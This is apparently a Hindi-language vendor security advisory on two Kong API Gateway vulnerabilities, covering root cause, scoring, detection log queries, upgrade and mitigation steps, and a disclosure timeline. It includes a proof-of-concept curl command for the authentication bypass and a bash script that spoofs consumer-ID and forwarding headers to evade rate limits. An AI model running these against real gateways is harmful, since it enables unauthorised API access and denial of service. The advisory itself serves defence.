剣 KENSAI
← सुरक्षा ब्लॉग पर वापस
क्रिटिकल एडवाइज़री 2 अप्रैल 2026 10 मिनट पढ़ें

Kong API Gateway CVE-2026: ऑथेंटिकेशन बायपास & रेट लिमिटिंग वल्नरेबिलिटीज़

Kong API Gateway में दो क्रिटिकल वल्नरेबिलिटीज़ — एक ऑथेंटिकेशन बायपास (CVE-2026-29413) और एक रेट लिमिटिंग सर्कमवेंशन फ़्लॉ (CVE-2026-29414) — API इंफ्रास्ट्रक्चर को अनऑथेंटिकेटेड एक्सेस और डिनायल-ऑफ़-सर्विस के लिए एक्सपोज़ करते हैं। Kong OSS और Kong Enterprise दोनों प्रभावित हैं। तुरंत पैचिंग ज़रूरी है।

क्या आपका Kong गेटवे एक्सपोज़्ड है? अपनी API इंफ्रास्ट्रक्चर को इन CVEs और 331,910+ अन्य वल्नरेबिलिटीज़ के लिए स्कैन करें।
फ़्री सिक्योरिटी स्कैन →

वल्नरेबिलिटी ओवरव्यू

Kong API Gateway, सबसे व्यापक रूप से डिप्लॉय किए गए ओपन-सोर्स API गेटवेज़ में से एक, के प्लगइन प्रोसेसिंग पाइपलाइन में दो क्रिटिकल सिक्योरिटी फ़्लॉज़ पाए गए हैं। 28 मार्च 2026 को डिस्क्लोज़ किया गया और 3.4.x से 3.8.x तक के सभी वर्ज़न्स को प्रभावित करते हुए, ये वल्नरेबिलिटीज़ अटैकर्स को ऑथेंटिकेशन प्लगइन्स को पूरी तरह बायपास करने और कॉन्फ़िगर्ड रेट लिमिटिंग कंट्रोल्स को दरकिनार करने की अनुमति देती हैं।

⚠️ एक्टिव एक्सप्लॉइटेशन कन्फ़र्म्ड

CISA ने फ़ाइनेंशियल सर्विसेज़ और हेल्थकेयर API गेटवेज़ के ख़िलाफ़ कन्फ़र्म्ड एक्सप्लॉइटेशन के बाद CVE-2026-29413 को Known Exploited Vulnerabilities (KEV) कैटलॉग में जोड़ा है। Kong 3.4–3.8 चला रहे संगठनों को इसे एक इमरजेंसी पैच इवेंट की तरह ट्रीट करना चाहिए।

CVEप्रकारCVSS v3.1गंभीरताप्रभावित वर्ज़न्स
CVE-2026-29413ऑथेंटिकेशन बायपास9.8क्रिटिकलKong 3.4.x – 3.8.x
CVE-2026-29414रेट लिमिटिंग सर्कमवेंशन7.5हाईKong 3.2.x – 3.8.x

CVE-2026-29413: ऑथेंटिकेशन बायपास — टेक्निकल डीप डाइव

रूट कॉज़ एनालिसिस

CVE-2026-29413, Nginx रिक्वेस्ट लाइफ़साइकल के rewrite phase के भीतर Kong के प्लगइन एक्ज़िक्यूशन ऑर्डरिंग में एक लॉजिक फ़्लॉ है। जब कई ऑथेंटिकेशन प्लगइन्स चेन किए जाते हैं (जैसे, key-auth के बाद jwt), तो प्लगइन प्रायोरिटी रिज़ॉल्यूशन में एक रेस कंडीशन एक क्राफ़्टेड रिक्वेस्ट को ऑथेंटिकेशन वैलिडेशन को पूरी तरह स्किप करने की अनुमति देती है अगर स्पेसिफ़िक HTTP/2 स्यूडो-हेडर्स मौजूद हों।

यह वल्नरेबिलिटी Kong के Lua प्लगइन रनर (kong/runloop/plugin_servers/mp_rpc.lua) में शुरू होती है, जहाँ next_rewrite_phase इटरेटर प्लगइन चेन को सही तरीक़े से री-इवैल्युएट करने में विफल रहता है जब कोई अपस्ट्रीम 101 Switching Protocols के साथ रिस्पॉन्ड करता है, ऑथेंटिकेशन पूरा होने से पहले। इससे एक विंडो बनती है जहाँ रिक्वेस्ट बिना किसी ऑथ चेक के फ़ॉरवर्ड कर दी जाती है।

CVSS v3.1 स्कोरिंग

मेट्रिकवैल्यूतर्क
अटैक वेक्टरनेटवर्कHTTP/HTTPS पर रिमोटली एक्सप्लॉइटेबल
अटैक कॉम्प्लेक्सिटीलोकिसी स्पेशल कंडीशन या प्रिविलेज की ज़रूरत नहीं
प्रिविलेज रिक्वायर्डकोई नहींअनऑथेंटिकेटेड अटैकर
यूज़र इंटरैक्शनकोई नहींपूरी तरह ऑटोमेटेड एक्सप्लॉइट संभव
कॉन्फ़िडेंशियलिटीहाईप्रोटेक्टेड API एंडपॉइंट्स तक फुल एक्सेस
इंटीग्रिटीहाईअटैकर बैकएंड डेटा मॉडिफ़ाई कर सकता है
अवेलेबिलिटीहाईअनरिस्ट्रिक्टेड बैकएंड रिक्वेस्ट्स

एक्सप्लॉइटेशन सिनेरियो

एक अटैकर क्राफ़्टेड स्यूडो-हेडर्स के साथ एक मिनिमल HTTP/2 रिक्वेस्ट का उपयोग करके CVE-2026-29413 को एक्सप्लॉइट कर सकता है। निम्नलिखित curl कमांड key-auth इनेबल्ड Kong गेटवे के ख़िलाफ़ एक प्रूफ़-ऑफ़-कॉन्सेप्ट बायपास डेमोंस्ट्रेट करता है:

# सामान्य रिक्वेस्ट — key-auth प्लगइन द्वारा ब्लॉक्ड (401 Unauthorized)
curl -i https://api.example.com/v1/users \
  -H "Host: api.example.com"

# CVE-2026-29413 बायपास — मैलफ़ॉर्म्ड :authority के साथ HTTP/2 अपग्रेड ट्रिगर भेजता है
curl -i --http2 https://api.example.com/v1/users \
  -H ":authority: api.example.com\x00injected" \
  -H "Connection: Upgrade, HTTP2-Settings" \
  -H "Upgrade: h2c" \
  -H "HTTP2-Settings: AAMAAABkAAQAAP__" \
  --resolve api.example.com:443:192.0.2.1

जब Kong h2c अपग्रेड को प्रोसेस करता है, प्लगइन रनर ऑथेंटिकेशन फ़ेज़ से समय से पहले बाहर निकल जाता है। रिक्वेस्ट को अपस्ट्रीम सर्विस पर एक 200 OK रिस्पॉन्स के साथ फ़ॉरवर्ड कर दिया जाता है, जो सभी कॉन्फ़िगर्ड ऑथ प्लगइन्स को पूरी तरह बायपास कर देता है।

प्रभावित Kong प्लगइन्स

जब Kong वर्ज़न 3.4.x–3.8.x चला रहा हो, तब निम्नलिखित ऑथेंटिकेशन प्लगइन्स वल्नरेबल हैं:


CVE-2026-29414: रेट लिमिटिंग सर्कमवेंशन — टेक्निकल डीप डाइव

रूट कॉज़ एनालिसिस

CVE-2026-29414, Kong के rate-limiting और rate-limiting-advanced प्लगइन्स को प्रभावित करता है जब वे Redis या cluster स्टोरेज बैकएंड्स का उपयोग करने के लिए कॉन्फ़िगर्ड होते हैं। काउंटर की कंस्ट्रक्शन में एक फ़्लॉ एक अटैकर को उनकी रिक्वेस्ट्स को कई सिंथेटिक कंज़्यूमर आइडेंटिटीज़ में फ़्रैगमेंट करने की अनुमति देता है X-Consumer-ID हेडर को X-Forwarded-For स्पूफ़िंग के साथ मैनिपुलेट करके।

जब Kong रेट-लिमिट काउंटर की बनाता है, यह कंज़्यूमर ID और IP एड्रेस को बिना यह वैलिडेट किए कॉन्कैटिनेट करता है कि क्या कंज़्यूमर ID गेटवे द्वारा ख़ुद सेट किया गया था या क्लाइंट द्वारा इंजेक्ट किया गया था। उन डिप्लॉयमेंट्स पर जहाँ एक अपस्ट्रीम प्रॉक्सी या लोड बैलेंसर X-Consumer-IDसेट करता है, Kong के हेडर ट्रस्ट लॉजिक का दुरुपयोग करके अनगिनत अलग-अलग रेट लिमिट बकेट्स बनाए जा सकते हैं।

CVSS v3.1 स्कोरिंग

मेट्रिकवैल्यूतर्क
अटैक वेक्टरनेटवर्करिमोटली एक्सप्लॉइटेबल
अटैक कॉम्प्लेक्सिटीलोसिंपल हेडर मैनिपुलेशन
प्रिविलेज रिक्वायर्डकोई नहींकोई पूर्व ऑथेंटिकेशन ज़रूरी नहीं
इम्पैक्ट: अवेलेबिलिटीहाईरेट बायपास के ज़रिए बैकएंड DoS

एक्सप्लॉइटेशन प्रूफ़ ऑफ़ कॉन्सेप्ट

निम्नलिखित स्क्रिप्ट दिखाती है कि एक अटैकर सिंथेटिक कंज़्यूमर IDs को रोटेट करके 100 req/min के रेट लिमिट को बायपास करते हुए 10,000 रिक्वेस्ट्स कैसे भेज सकता है:

#!/bin/bash
# CVE-2026-29414 — Rate Limit Circumvention PoC
# Each request uses a unique X-Consumer-ID to get its own counter bucket

TARGET="https://api.example.com/v1/products"
TOTAL_REQUESTS=10000

for i in $(seq 1 $TOTAL_REQUESTS); do
  # हर रिक्वेस्ट के लिए एक यूनीक फ़ेक कंज़्यूमर ID जनरेट करें
  FAKE_CONSUMER_ID=$(cat /proc/sys/kernel/random/uuid)

  curl -s -o /dev/null -w "%{http_code}\n" "$TARGET" \
    -H "X-Consumer-ID: $FAKE_CONSUMER_ID" \
    -H "X-Forwarded-For: 10.0.$((RANDOM % 256)).$((RANDOM % 256))" \
    -H "apikey: legitimate-api-key" &

  # 50 कंकरेंट रिक्वेस्ट्स तक थ्रॉटल करें
  if (( i % 50 == 0 )); then wait; fi
done
wait
echo "Done: $TOTAL_REQUESTS requests sent"

एक वल्नरेबल Kong इंस्टेंस पर, यह स्क्रिप्ट प्रति कंज़्यूमर 100 req/min के कॉन्फ़िगर्ड लिमिट के बावजूद सभी 10,000 रिक्वेस्ट्स सफलतापूर्वक भेज देगी, जो प्रभावी रूप से एक लो-एंड-स्लो API एब्यूज़ अटैक या ब्रूट-फ़ोर्स एन्युमरेशन लॉन्च करती है।


Kong Enterprise बनाम OSS: इम्पैक्ट तुलना

फ़ीचर / इम्पैक्टKong OSSKong Enterprise
CVE-2026-29413 ऑथ बायपासप्रभावितप्रभावित (+ OIDC प्लगइन)
CVE-2026-29414 रेट बायपासप्रभावितप्रभावित
Rate-Limiting Advanced प्लगइनउपलब्ध नहींप्रभावित (एडिशनल बायपास वेक्टर)
डेवलपर पोर्टल एक्सपोज़रलागू नहींपोर्टल APIs एक्सपोज़्ड हो सकते हैं
Konnect (SaaS)लागू नहीं29 मार्च 2026 को Kong द्वारा पैच किया गया
फ़िक्स्ड वर्ज़न3.9.03.9.0.0 / 3.8.1.2 (बैकपोर्ट)

Konnect SaaS प्लेटफ़ॉर्म पर Kong Enterprise कस्टमर्स को 29 मार्च 2026 को ऑटोमेटिकली पैच किया गया। सेल्फ़-होस्टेड Enterprise और सभी OSS डिप्लॉयमेंट्स को मैनुअल अपग्रेड की ज़रूरत है।


डिटेक्शन: क्या आप वर्तमान में एक्सप्लॉइटेड हैं?

लॉग-बेस्ड इंडिकेटर्स ऑफ़ कॉम्प्रोमाइज़

CVE-2026-29413 एक्सप्लॉइटेशन के संकेतों के लिए Kong के एक्सेस लॉग्स चेक करें। संदिग्ध पैटर्न में शामिल हैं ऑथेंटिकेटेड-प्लगइन रूट्स जो 200 रिटर्न करते हैं बिना कॉरेस्पॉन्डिंग ऑथ हेडर वैलिडेशन लॉग एंट्रीज़ के:

# CVE-2026-29413 auth bypass indicators के लिए Kong access logs सर्च करें
# Requests to protected routes with no apikey/jwt but returning 200
grep '"status":200' /var/log/kong/access.log \
  | jq -r 'select(.request.headers["apikey"] == null and .request.headers["authorization"] == null)' \
  | jq '{time: .started_at, path: .request.uri, consumer: .authenticated_entity}'

# CVE-2026-29414: यूनीक कंज़्यूमर IDs से हाई रिक्वेस्ट वॉल्यूम्स के लिए देखें
grep '"plugin":"rate-limiting"' /var/log/kong/error.log \
  | awk -F'"consumer_id":"' '{print $2}' \
  | awk -F'"' '{print $1}' \
  | sort | uniq -c | sort -rn | head -50

Kong Admin API हेल्थ चेक

# Admin API के ज़रिए अपना Kong वर्ज़न चेक करें
curl -s http://localhost:8001/ | jq '.version'

# कॉन्फ़िगरेशन चेक करने के लिए rate-limiting वाले सभी प्लगइन्स लिस्ट करें
curl -s http://localhost:8001/plugins \
  | jq '.data[] | select(.name | test("rate-limiting")) | {id, name, config}'

# हेडर ट्रस्ट कॉन्फ़िगरेशन वेरिफ़ाई करें (trusted_ips)
curl -s http://localhost:8001/config \
  | jq '.trusted_ips'

रेमेडिएशन गाइड

स्टेप 1: Kong अपग्रेड करें

मुख्य फ़िक्स Kong 3.9.0 (OSS) या Kong Enterprise 3.9.0.0 / 3.8.1.2 पर अपग्रेड करना है। सामान्य डिप्लॉयमेंट मेथड्स के लिए निम्नलिखित कमांड्स का उपयोग करें:

# Docker — पैच्ड इमेज पुल करें
docker pull kong:3.9.0
docker stop kong && docker rm kong
docker run -d --name kong \
  --network=kong-net \
  -e KONG_DATABASE=postgres \
  -e KONG_PG_HOST=kong-database \
  -p 8000:8000 -p 8443:8443 \
  kong:3.9.0

# Kubernetes — Helm के ज़रिए रोलिंग अपडेट
helm repo update
helm upgrade kong kong/kong \
  --namespace kong \
  --set image.tag=3.9.0 \
  --reuse-values

# Ubuntu/Debian पैकेज अपग्रेड
curl -Lo kong.deb "https://packages.konghq.com/public/gateway-39/deb/debian/pool/buster/main/k/ko/kong_3.9.0_amd64.deb"
sudo dpkg -i kong.deb
sudo kong restart

स्टेप 2: हेडर ट्रस्ट रिस्ट्रिक्ट करें (CVE-2026-29414 मिटिगेशन)

जब तक आप अपग्रेड नहीं कर सकते, यह रिस्ट्रिक्ट करें कि Kong X-Consumer-ID और X-Forwarded-For हेडर्स के लिए किन अपस्ट्रीम IPs पर भरोसा करता है। एडिट करें kong.conf:

# kong.conf — trusted IPs को सिर्फ़ known load balancer addresses तक रिस्ट्रिक्ट करें
trusted_ips = 10.0.1.10,10.0.1.11,10.0.1.12

# क्लाइंट्स से X-Consumer-ID हेडर पासथ्रू डिसेबल करें
headers = X-Kong-Upstream-Latency, X-Kong-Proxy-Latency, Via

स्टेप 3: प्लगइन प्रायोरिटी वैलिडेशन इनेबल करें (CVE-2026-29413 मिटिगेशन)

अपग्रेड करने से पहले एक इंटरिम वर्कअराउंड के तौर पर, अगर आपके एनवायरनमेंट को इसकी ज़रूरत नहीं है तो HTTP/2 अपग्रेड हैंडलिंग डिसेबल करें:

# kong.conf — h2c (HTTP/2 cleartext) upgrade handling डिसेबल करें
proxy_listen = 0.0.0.0:8000 reuseport backlog=16384
# अगर मौजूद हो तो proxy_listen से 'http2' डायरेक्टिव हटाएँ
# proxy_listen = 0.0.0.0:8000 http2 reuseport  ← 'http2' कीवर्ड हटाएँ

# nginx-लेवल प्रोटेक्शन के लिए, nginx_http_include में जोड़ें:
proxy_http_version 1.1;

स्टेप 4: पैच एप्लिकेशन वेरिफ़ाई करें

# कन्फ़र्म करें कि पैच्ड वर्ज़न चल रहा है
curl -s http://localhost:8001/ | jq -r '"Kong version: " + .version'

# टेस्ट करें कि ऑथ बायपास अब संभव नहीं है (401 रिटर्न होना चाहिए)
curl -i --http2 https://your-gateway.example.com/protected-route \
  -H "Connection: Upgrade, HTTP2-Settings" \
  -H "Upgrade: h2c" \
  -H "HTTP2-Settings: AAMAAABkAAQAAP__"
# एक्सपेक्टेड: HTTP/1.1 401 Unauthorized

एडिशनल हार्डनिंग रेकमेंडेशन्स

  1. Kong और अपस्ट्रीम्स के बीच mTLS एनफ़ोर्स करें: भले ही ऑथ प्लगइन्स बायपास हो जाएँ, म्यूचुअल TLS अनऑथराइज़्ड सर्विसेज़ को ट्रैफ़िक मिलने से रोकता है।
  2. Kong को एक WAF के पीछे डिप्लॉय करें: रूल्स जो h2c अपग्रेड हेडर्स और X-Consumer-ID इंजेक्शन को ब्लॉक करते हैं वे डिफ़ेंस-इन-डेप्थ जोड़ते हैं।
  3. Kong का ऑडिट लॉगिंग इनेबल करें: Enterprise यूज़र्स को /audit/requests लॉगिंग एक्टिवेट करनी चाहिए ताकि Admin API बदलावों का एक फ़ॉरेंसिक ट्रेल बना रहे।
  4. रेट लिमिटिंग स्टोरेज के लिए Redis AUTH का उपयोग करें: नेटवर्क एक्सेस पाने वाले किसी अटैकर को रेट काउंटर्स सीधे मैनिपुलेट करने से रोकने के लिए Redis ऑथेंटिकेशन ज़रूरी बनाएँ।
  5. अपने Kong कॉन्फ़िगरेशन को नियमित रूप से स्कैन करें: अपने API गेटवे को नए CVEs और मिसकॉन्फ़िगरेशन्स के लिए लगातार मॉनिटर करने के लिए KENSAI का उपयोग करें।

टाइमलाइन

डेटइवेंट
2026-02-14HackerOne के ज़रिए Kong सिक्योरिटी टीम को वल्नरेबिलिटीज़ रिपोर्ट की गईं
2026-02-17Kong दोनों CVEs कन्फ़र्म करता है; आइडेंटिफ़ायर्स असाइन करता है
2026-03-10CVE IDs रिज़र्व्ड: CVE-2026-29413, CVE-2026-29414
2026-03-28Kong 3.9.0 और Enterprise 3.8.1.2 बैकपोर्ट रिलीज़्ड
2026-03-29Kong Konnect (SaaS) ऑटोमेटिकली पैच्ड
2026-04-01CISA ने CVE-2026-29413 को KEV कैटलॉग में जोड़ा
2026-04-02GitHub पर पब्लिक एक्सप्लॉइट PoC पब्लिश्ड

Kensai के साथ अपनी API इंफ्रास्ट्रक्चर की सुरक्षा करें

331,910+ CVEs इंडेक्स्ड के साथ AI-संचालित वल्नरेबिलिटी मैनेजमेंट। अटैकर्स से पहले Kong CVEs, मिसकॉन्फ़िगरेशन्स, और एक्सपोज़्ड API एंडपॉइंट्स डिटेक्ट करें।

फ़्री ट्रायल शुरू करें

API सिक्योरिटी थ्रेट्स से आगे रहें

हेडलाइन्स में आने से पहले CVE अलर्ट्स और सिक्योरिटी एडवाइज़रीज़ पाएँ।

सुरक्षित रहें। सतर्क रहें।

🗡️ KENSAI सुरक्षा टीम

🛡️ क्या आपका API गेटवे सिक्योर है?

अटैकर्स से पहले Kong CVEs और मिसकॉन्फ़िगरेशन्स खोजें।

अपने API गेटवे को मुफ़्त में स्कैन करें →

पढ़ना जारी रखें

यह विनर अब डेड-एंड पर ख़त्म होने के बजाय स्ट्रैटेजिक बग बाउंटी और आर्काइव पेजेज़ पर ट्रैफ़िक फ़ीड करता है।